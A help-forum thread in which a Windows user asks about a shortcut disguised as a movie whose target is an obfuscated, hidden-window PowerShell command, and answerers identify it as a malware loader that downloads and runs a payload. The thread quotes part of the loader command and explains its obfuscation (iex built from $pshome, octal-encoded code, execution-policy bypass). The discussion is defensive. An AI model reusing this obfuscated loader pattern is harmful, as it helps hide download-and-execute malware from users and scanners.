What does specifically this link do or is it a virus?

6

In Windows 10 I downloaded this file that I thought was a movie but it was a short-cut with a size of 700MB

I see that the target is this

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

And it was set to start at

%SYSTEMROOT%\System32\WindowsPowerShell\v1.0

What does it do?

Erik

Posted 2018-11-12T14:13:07.380

Reputation: 163

Question was closed 2018-11-12T21:53:42.070

1-nopr, -wind & byp are all pretty scary...The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to. – spikey_richie – 2018-11-12T14:35:32.097

thanks, I actually pressed the link, the Powershell briefly poped up thats all, so far – Erik – 2018-11-12T14:38:42.577

7It is obviously some sort of malware. The digits are octal numbers which translate into $aspx = ((New-Object System.N, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including root-kit scan). Depending on its nature it could have infected other systems in your network. – AFH – 2018-11-12T14:45:21.067

I have McaFee liveSafe premium but it did not react – Erik – 2018-11-12T14:47:46.440

1

Some similar obfuscated code is documented here.

– AFH – 2018-11-12T14:59:35.190

Answers

8

It's a malware loader.

It executes a powershell code beginning with New-Object System.N... (hidden in the numbers), which in full content is New-Object System.Net.WebClient, that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.

If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.

You may try to paste your line to notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it to PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.

Michał Sacharewicz

Posted 2018-11-12T14:13:07.380

Reputation: 1 944

thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116
How can i make out something from this code? – Erik – 2018-11-12T18:25:39.907

1There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run. – trognanders – 2018-11-12T20:51:35.733

Please pass the complete code, incl. commas. – Michał Sacharewicz – 2018-11-13T10:05:08.713

that is the code I got following your instructions, 441411631601704075405050116..... – Erik – 2018-11-14T08:48:15.920

You're missing something. Please paste whole shortcut code. – Michał Sacharewicz – 2018-11-15T18:13:24.267

Asked: 2018-11-12T14:13:07.380

Viewed: 1 134 times

Active: 2018-11-12T19:26:59.690